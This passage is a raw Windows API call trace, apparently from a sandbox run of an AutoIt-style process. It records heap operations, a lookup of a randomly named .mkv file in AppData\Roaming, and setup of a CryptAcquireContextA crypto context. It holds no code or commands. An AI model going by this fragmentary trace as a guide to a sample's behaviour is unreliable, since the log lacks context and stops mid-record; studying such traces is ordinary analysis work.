wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0235.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0235.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0235.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f918 [0235.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0235.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0235.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0235.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8a0 [0235.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0235.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0235.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0235.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f940 [0235.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0235.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0235.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f918 | out: hHeap=0x970000) returned 1 [0235.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0235.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0235.637] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0235.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0235.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0235.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa80 [0235.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0235.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0235.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0235.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f918 [0235.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0235.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0235.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0235.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7faf8 [0235.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0235.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0235.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0235.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0235.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0235.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0235.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0235.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0235.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0235.640] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/P22ObdW9p9DNX.mkv", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41883640, ftCreationTime.dwHighDateTime=0x1d5e97c, ftLastAccessTime.dwLowDateTime=0xeefa6880, ftLastAccessTime.dwHighDateTime=0x1d5ea02, ftLastWriteTime.dwLowDateTime=0xeefa6880, ftLastWriteTime.dwHighDateTime=0x1d5ea02, nFileSizeHigh=0x0, nFileSizeLow=0xd180, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="P22ObdW9p9DNX.mkv", cAlternateFileName="P22OBD~1.MKV")) returned 0xa87110 [0235.640] FindClose (in: hFindFile=0xa87110 | out: hFindFile=0xa87110) returned 1 [0235.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0235.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0235.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0235.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0235.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0235.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0235.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0235.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fa80 | out: hHeap=0x970000) returned 1 [0235.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0235.640] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0235.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0235.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0235.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0235.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0235.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fad0 [0235.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0235.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0235.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0235.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0235.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0235.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0235.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0235.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0235.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0235.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0235.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0235.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0235.641] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f968 [0235.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0235.641] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0235.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f968 | out: hHeap=0x970000) returned 1 [0235.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0235.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0235.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0235.642] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0235.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0235.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0235.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0235.642] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0235.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0235.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0235.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0235.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0235.642] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0235.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0235.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0235.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0235.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0235.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0235.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0235.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0235.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0235.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0235.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0235.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0235.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0235.643] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0235.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0235.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0235.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0235.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f878 [0235.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0235.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0235.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0235.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f968 [0235.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0235.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0235.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0235.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa58 [0235.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0235.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0235.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0235.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0235.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0235.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0235.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0235.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0235.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0235.643] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0235.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0235.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0235.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0235.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0235.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0235.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0235.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0235.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f878 | out: hHeap=0x970000) returned 1 [0235.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0235.644] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0235.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0235.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0235.664] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0235.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0235.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0235.664] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0235.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0235.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0235.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0235.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0235.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0235.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0235.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0235.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0235.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cf8 [0235.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa80 [0235.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0235.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0235.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0235.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f878 [0235.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0235.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0235.676] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0235.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0235.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0235.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0235.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0235.676] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0235.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0235.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0235.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f878 | out: hHeap=0x970000) returned 1 [0235.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0235.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fa80 | out: hHeap=0x970000) returned 1 [0235.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0235.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0235.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0235.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0235.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0235.676] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0235.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0235.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0235.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0235.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0235.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0235.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f878 [0235.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0235.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0235.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0235.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0235.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0235.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0235.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0235.677] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0235.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0235.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0235.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0235.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa80 [0235.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0235.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0235.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0235.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0235.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0235.678] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0235.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0235.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0235.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0235.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0235.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0235.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0235.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0235.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0235.678] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0235.678] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0235.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0235.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0235.678] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0235.678] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0235.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0235.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e699e8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0235.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0235.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0235.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e698c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0235.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0235.679] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0235.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0235.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0235.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0235.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0235.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0235.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0235.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0235.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0235.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0235.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0235.681] 